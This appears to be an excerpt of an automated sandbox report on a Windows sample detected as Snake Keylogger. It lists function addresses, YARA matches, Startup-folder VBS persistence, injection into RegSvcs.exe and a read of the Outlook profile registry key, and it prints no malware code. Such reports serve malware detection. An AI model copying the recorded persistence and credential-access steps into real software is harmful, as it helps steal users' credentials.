                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0123C7388_2_0123C738
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_012369A08_2_012369A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0123E9888_2_0123E988
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0123CA088_2_0123CA08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01233AA18_2_01233AA1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01239DE08_2_01239DE0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0123CCD88_2_0123CCD8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0123CFAC8_2_0123CFAC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01236FC88_2_01236FC8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_01233E098_2_01233E09
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0123F9618_2_0123F961
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0123E97C8_2_0123E97C
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_012339EE8_2_012339EE
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_012329EC8_2_012329EC
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06931E808_2_06931E80
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069317A08_2_069317A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06939C708_2_06939C70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693FC688_2_0693FC68
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069395488_2_06939548
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06930B308_2_06930B30
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069350288_2_06935028
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069329688_2_06932968
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693E6B08_2_0693E6B0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693E6A08_2_0693E6A0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693DE008_2_0693DE00
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06931E708_2_06931E70
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693178F8_2_0693178F
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693EF518_2_0693EF51
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693EF608_2_0693EF60
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693CCA08_2_0693CCA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693DDF18_2_0693DDF1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693DDFF8_2_0693DDFF
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693D5508_2_0693D550
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693D5408_2_0693D540
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693EAF88_2_0693EAF8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693E2588_2_0693E258
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693E24A8_2_0693E24A
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06938B918_2_06938B91
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693F3B88_2_0693F3B8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06938BA08_2_06938BA0
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06939BFA8_2_06939BFA
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693EB088_2_0693EB08
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_06930B208_2_06930B20
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069393288_2_06939328
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693D0F88_2_0693D0F8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693D0E98_2_0693D0E9
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693F8108_2_0693F810
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069350188_2_06935018
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693F8028_2_0693F802
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069300068_2_06930006
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_069300408_2_06930040
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693D9998_2_0693D999
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693D9A88_2_0693D9A8
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 8_2_0693295B8_2_0693295B
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: String function: 0058F9F2 appears 31 times
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: String function: 00590A30 appears 46 times
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: String function: 00D6F9F2 appears 31 times
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: String function: 00D70A30 appears 46 times
                  Source: AHSlIDftf1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                  Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.Sancerre.exe.730000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.Sancerre.exe.1450000.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 1.2.Sancerre.exe.730000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPEMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 5.2.Sancerre.exe.1450000.1.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000002.00000002.2971940061.0000000000402000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000005.00000002.1922198708.0000000001450000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: MAL_Envrial_Jan18_1 date = 2018-01-21, hash2 = 9edd8f0e22340ecc45c5f09e449aa85d196f3f506ff3f44275367df924b95c5d, hash1 = 9ae3aa2c61f7895ba6b1a3f85fbe36c8697287dc7477c5a03d32cf994fdbce85, author = Florian Roth, description = Detects Encrial credential stealer malware, reference = https://twitter.com/malwrhunterteam/status/953313514629853184, license = https://creativecommons.org/licenses/by-nc/4.0/
                  Source: 00000001.00000002.1767534458.0000000000730000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook author = ditekSHen, description = Detects executables with potential process hoocking
                  Source: Process Memory Space: Sancerre.exe PID: 5812, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: RegSvcs.exe PID: 3328, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: Process Memory Space: Sancerre.exe PID: 3244, type: MEMORYSTRMatched rule: Windows_Trojan_SnakeKeylogger_af3faa65 os = windows, severity = x86, creation_date = 2021-04-06, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.SnakeKeylogger, fingerprint = 15f4ef2a03c6f5c6284ea6a9013007e4ea7dc90a1ba9c81a53a1c7407d85890d, id = af3faa65-b19d-4267-ac02-1a3b50cdc700, last_modified = 2021-08-23
                  Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winEXE@10/6@4/4
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC37B5 GetLastError,FormatMessageW,0_2_00DC37B5
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB10BF AdjustTokenPrivileges,CloseHandle,0_2_00DB10BF
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DB16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,0_2_00DB16C3
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005D10BF AdjustTokenPrivileges,CloseHandle,1_2_005D10BF
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeCode function: 1_2_005D16C3 LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,1_2_005D16C3
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC51CD SetErrorMode,GetDiskFreeSpaceExW,SetErrorMode,0_2_00DC51CD
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DDA67C CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,0_2_00DDA67C
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00DC648E _wcslen,CoInitialize,CoCreateInstance,CoUninitialize,0_2_00DC648E
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeCode function: 0_2_00D542A2 CreateStreamOnHGlobal,FindResourceExW,LoadResource,SizeofResource,LockResource,0_2_00D542A2
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeFile created: C:\Users\user\AppData\Local\konkedJump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeMutant created: NULL
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeFile created: C:\Users\user\AppData\Local\Temp\autE6FE.tmpJump to behavior
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs"
                  Source: AHSlIDftf1.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                  Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                  Source: AHSlIDftf1.exeVirustotal: Detection: 70%
                  Source: AHSlIDftf1.exeReversingLabs: Detection: 73%
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeFile read: C:\Users\user\Desktop\AHSlIDftf1.exeJump to behavior
                  Source: unknownProcess created: C:\Users\user\Desktop\AHSlIDftf1.exe "C:\Users\user\Desktop\AHSlIDftf1.exe"
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeProcess created: C:\Users\user\AppData\Local\konked\Sancerre.exe "C:\Users\user\Desktop\AHSlIDftf1.exe"
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\AHSlIDftf1.exe"
                  Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Sancerre.vbs"
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\konked\Sancerre.exe "C:\Users\user\AppData\Local\konked\Sancerre.exe"
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\konked\Sancerre.exe"
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeProcess created: C:\Users\user\AppData\Local\konked\Sancerre.exe "C:\Users\user\Desktop\AHSlIDftf1.exe"Jump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\Desktop\AHSlIDftf1.exe"Jump to behavior
                  Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\konked\Sancerre.exe "C:\Users\user\AppData\Local\konked\Sancerre.exe" Jump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe "C:\Users\user\AppData\Local\konked\Sancerre.exe" Jump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Users\user\Desktop\AHSlIDftf1.exeSection loaded: apphelp.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: slc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: sppc.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: wsock32.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: version.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: winmm.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: mpr.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: wininet.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: iphlpapi.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: userenv.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: uxtheme.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: kernel.appcore.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: windows.storage.dllJump to behavior
                  Source: C:\Users\user\AppData\Local\konked\Sancerre.exeSection loaded: wldp.dllJump to behavior
                  Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676Jump to behavior
                  Source: AHSlIDftf1.exeStatic file information: File size 1109504 > 1048576
                  Source: AHSlIDftf1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
                  Source: AHSlIDftf1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
                  Source: AHSlIDftf1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
                  Source: AHSlIDftf1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: AHSlIDftf1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
                  Source: AHSlIDftf1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
                  Source: AHSlIDftf1.exeStatic PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                  Source: Binary string: wntdll.pdbUGP source: Sancerre.exe, 00000001.00000003.1764694364.00000000038D0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000001.00000003.1765322342.0000000003730000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1917758127.0000000003EB0000.00000004.00001000.00020000.00000000.sdmp, Sancerre.exe, 00000005.00000003.1918092494.0000000003D10000.00000004.00001000.00020000.00000000.sdmp
